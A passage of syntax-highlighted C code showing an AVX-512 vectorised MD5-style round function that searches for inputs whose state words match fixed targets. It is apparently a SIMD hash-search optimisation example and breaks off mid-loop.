<span class="k">static</span> <span class="kt">uint32_t</span> <span class="nf">md5_avx512</span><span class="p">(</span><span class="n">__m512i</span> <span class="n">x0</span><span class="p">,</span> <span class="n">__m512i</span> <span class="n">x1</span><span class="p">,</span> <span class="n">__m512i</span> <span class="n">x2</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">__m512i</span> <span class="n">a</span> <span class="o">=</span> <span class="n">_mm512_setzero_si512</span><span class="p">();</span>
    <span class="n">__m512i</span> <span class="n">b</span> <span class="o">=</span> <span class="n">_mm512_setzero_si512</span><span class="p">();</span>
    <span class="n">__m512i</span> <span class="n">c</span> <span class="o">=</span> <span class="n">_mm512_setzero_si512</span><span class="p">();</span>
    <span class="n">__m512i</span> <span class="n">d</span> <span class="o">=</span> <span class="n">_mm512_setzero_si512</span><span class="p">();</span>

    <span class="c1">// Round 1</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xd76aa478</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xe8c7b756</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x242070db</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xc1bdceee</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf57c0faf</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x4787c62a</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xa8304613</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfd469501</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x698098d8</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x8b44f7af</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xffff5bb1</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x895cd7be</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x6b901122</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfd987193</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xa67943e6</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_F</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x49b40821</span><span class="p">));</span>

    <span class="c1">// Round 2</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf61e2562</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xc040b340</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x265e5a51</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xe9b6c7aa</span><span class="p">)));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xd62f105d</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x02441453</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xd8a1e681</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xe7d3fbc8</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x21e1cde6</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xc337082e</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf4d50d87</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x455a14ed</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xa9e3e905</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfcefa3f8</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x676f02d9</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_G</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x8d2a4c8a</span><span class="p">));</span>

    <span class="c1">// Round 3</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfffa3942</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x8771f681</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x6d9d6122</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfde53864</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xa4beea44</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x4bdecfa9</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf6bb4b60</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xbebfbc70</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x289b7ec6</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xeaa127fa</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xd4ef3085</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x04881d05</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xd9d4d039</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xe6db99e5</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x1fa27cf8</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_H</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xc4ac5665</span><span class="p">)));</span>

    <span class="c1">// Round 4</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf4292244</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x432aff97</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xab9423ff</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfc93a039</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x655b59c3</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x8f0ccc92</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xffeff47d</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x85845dd1</span><span class="p">)));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x6fa87e4f</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xfe2ce6e0</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xa3014314</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x4e0811a1</span><span class="p">));</span>

    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xf7537e82</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xbd3af235</span><span class="p">));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x2ad7d2bb</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xeb86d391</span><span class="p">));</span>

    <span class="n">__mmask16</span> <span class="n">eq_c</span> <span class="o">=</span> <span class="n">_mm512_cmpeq_epi32_mask</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="n">T0</span><span class="p">));</span>
    <span class="n">__mmask16</span> <span class="n">eq_d</span> <span class="o">=</span> <span class="n">_mm512_cmpeq_epi32_mask</span><span class="p">(</span><span class="n">d</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="n">T1</span><span class="p">));</span>
    <span class="n">__mmask16</span> <span class="n">eq</span> <span class="o">=</span> <span class="n">eq_c</span> <span class="o">&amp;</span> <span class="n">eq_d</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">eq</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">64</span><span class="p">)))</span> <span class="kt">uint32_t</span> <span class="n">_x0</span><span class="p">[</span><span class="mi">16</span><span class="p">],</span> <span class="n">_x1</span><span class="p">[</span><span class="mi">16</span><span class="p">],</span> <span class="n">_x2</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
        <span class="n">_mm512_store_si512</span><span class="p">(</span><span class="n">_x0</span><span class="p">,</span> <span class="n">x0</span><span class="p">);</span>
        <span class="n">_mm512_store_si512</span><span class="p">(</span><span class="n">_x1</span><span class="p">,</span> <span class="n">x1</span><span class="p">);</span>
        <span class="n">_mm512_store_si512</span><span class="p">(</span><span class="n">_x2</span><span class="p">,</span> <span class="n">x2</span><span class="p">);</span>

        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">16</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
